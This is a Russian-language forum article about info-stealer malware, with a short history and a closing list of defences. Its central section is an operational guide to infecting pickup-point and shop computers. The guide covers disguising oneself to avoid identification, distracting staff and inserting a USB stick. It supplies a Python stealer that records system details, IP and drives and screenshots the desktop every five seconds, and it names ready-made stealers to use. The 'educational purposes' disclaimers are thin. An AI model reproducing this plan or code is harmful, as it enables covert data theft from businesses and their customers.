Статья Что такое Стиллеры? | Как защитить свои данные от кражи и как они работают

Введение
image(3).webp

Всем приветик, сегодня мы затронем очень важную и весьма опасную тему, стиллеры... А именно что это такое? Как можно заражать корпорации и своих знакомых? Но это строго в обучающих целях, я хочу чтобы ИП начали серьёзнее относиться к информационной безопасности на своих "Бизнесах".
Стиллеры — это вид вредоносного ПО, предназначенный для кражи информации, такой как пароли, логины, данные кредитных карт и другая личная информация. Стиллеры могут работать в фоновом режиме на компьютере или мобильном устройстве, собирая данные, которые вводит пользователь, и отправляя их злоумышленникам. Более того, стиллеры могут быть встроены в другие программы или распространяться через фишинговые письма, зараженные веб-сайты или загрузки. Запомните ребятки:
THE DEMON IS ESPECIALLY POWERFUL, WHEN YOU CAN'T SEE HIM
Неустанно буду это повторять эту фразу, ибо только она передаёт всю картину, как она есть. Стилер - это крыса в вашей системе, тихая, практически невидимая, которая ворует вашу информацию.


История стиллеров
Стилеры начали появляться в начале 2000-х, которые могли собирать учетные данные из браузеров, такие как логины и пароли. С течением времени стилеры стали более сложными и многофункциональными. Они начали включать в себя возможности для кражи данных из различных приложений, таких как FTP-клиенты и мессенджеры. Но их расцвет пришёлся на 2010 год... В 2010-х годах стилеры стали одной из самых распространенных форм вредоносного ПО. Появились такие известные образцы, как Zeus и SpyEye, которые использовали сложные механизмы для обхода систем безопасности и сбора данных.


Тенденции стиллеров
Стилеры это такая вещь, что как бы не развивались технологии или системы безопасности, они всегда будут актуальны, ибо ключевой фигурой выступает человек. В общем, стилеры ещё будут жить, но загружать их на пользовательские ПК всё сложнее и сложнее. Они могут использовать шифрование для скрытия своих действий и обхода антивирусных систем, но только до новой версии антивируса.


Заражаем Корпорации (теоритически)
image(2).webp

Первым делом, мы должны выбрать место для реализации успешной атаки, очевидно, что это места где есть компьютеры, если хорошо подумать, то на ум мне приходят различные маркетплейсы, давайте объясню вам алгоритм.
По правде скажу что я знаю как относятся к ПК на ПВЗ, там абсолютно чистая винда, без антивируса, но зато с личными страницами ВК и акканутами Google. Откуда я знаю? Работал сис. админом для парочки ИП. Не суть.
Это также можно проворачивать в цветочных магазинах, кафе, в общем в любых людных местах, всё зависит от ситуации.
  • Вы заказываете абсолютно ненужный товар за копейки, будто зубная щётка или набор зубочисток.
  • Вы пишите небольшой стилер на Python (Данный стилер будет "отправлять" вам скриншот рабочего стола каждые 5 секунд и файлик с конфигурацией докучи (отправку в тг или на почту сами реализуете, тем более автозапуск, это чисто пример))
Python:
import os
import win32api
import requests
import time
import sys
import platform
from PIL import ImageGrab

def main():
    drives = str(win32api.GetLogicalDriveStrings())
    drives = str(drives.split('\000')[:-1])
    response = requests.get("https://ident.me").text
    all_data = "Time: " + time.asctime() + '\n' + "Кодировка ФС: " + sys.getfilesystemencoding() + '\n' + "Cpu: " + platform.processor() + '\n' + "Система: " + platform.system() + ' ' + platform.release() + '\nIP: '+requests.get("https://ident.me").text+'\nДиски:' + str(drives)
    file = open(os.getenv("APPDATA") + '\\alldata.txt', "w+")
    file.write(all_data)
    file.close()

def screenshoot():
    while True:
        time.sleep(5)
        screen = ImageGrab.grab()
        screen.save(os.getenv("APPDATA") + '\\sreenshot.jpg')

if __name__ == "__main__":
    main()
    screenshoot()
  • Теперь вы загружаете его на флешку.
  • Одеваете новую одежду или ту что не жалко, очки и шляпа будут не лишними, вставляем камешек в ботинок(для изменения нашей походки) и одеваем перчатки
  • Идём в ближайший пункт выдачи заказов любого маркетплейса
Важно отметить, что чтобы нам удалось такое провернуть, стол должен иметь не слишком защищённую спину, так чтобы мы могли видеть заднюю часть пк, как правило, пк стоят под столом.
  • Показываем QR и пока сотрудник отлучился на склад, вставляем флешку. (Немного социальной инженерии)
Если у вас 80 lvl социальной инженерии, вы можете даже уговорить сотрудника самому запустить зловред:oops:
Если нет, то здесь есть очень неприятный момент, чтобы запустить файл нужно либо запустить самому, либо чтобы при инпуте флешки exe файл запускался сам (да ещё нужно будет обернуть его через pyinstaller в exe).
Либо, вы можете использовать один из готовых стилеров (строго в образовательных целях):
  1. Acrid
  2. ScarletStealer
  3. SYS01
  4. sAINT
Однако, если вам такое интересно, то я выпущую 2 часть с практической частью, где мы протестируем это всё в деле и напишем свой более проработаный стилер, всё зависит от заинтересованости в такой статье и лайках.
Если походить и позарожать так несколько пунктов, то можно очень сильно поставить под угрозу чей-то бизнес, я уж молчу о троянах типа того же NjRat. А таких вот столов с открытым доступом к заднему корпусу ПК миллиарды и скорее всего ваш ПВЗ у дома не стал исключением.


Защита от стиллера
image.webp

Итак, сейчас попробуем защититься от стилера.
  • Регулярные обновления ПО - это намного важнее, чем может показаться на первый взгляд. Устаревшее ПО и ОС часто содержат уязвимости, которые могут быть использованы стилерами.
  • Использование антивируса - Не пожалейте пару кровных и купите надёжный антивирус. В будущем это убережёт вас от большинства проблем.
  • Осторожность с соц. сетями - Не скачивайте всё подряд, да да да.
  • Настройка брандмауэра - Так даже если зловред попадёт на ваш ПК, то его ждёт поражение в виде брандмауэра.
  • Обучение базе - НАУЧИТЕ ПОЛЬЗОВАТЕЛЕЙ КОМПЬЮТЕРНОЙ БЕЗОПАСНОСТИ УЖЕ!!! Когда новые сотрудники приходят на такую работу, зачастую они не умеют пользоваться ПК, из-за чего, заражают корпоративную тачку.
  • Ну и в свойствах Windows отключите автозапуск чего-либо по умолчанию.


Заключение
Что-ж, в этой маленькой статье я рассказал вам о вреде стилеров, как он может выглядеть и как предотвратить заражение им. Для такой статьи я думаю данный код будет вполне уместным, как я уже говорил, 2 часть зависит от вас и вашей заинтересованости. Предлагайте свои замечания или пожелания в комментариях. Что упустил, что забыл. А так желаю всем хорошо времени суток.
 
Последнее редактирование:
  • Нравится
Реакции: BadBunny и UseR-
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!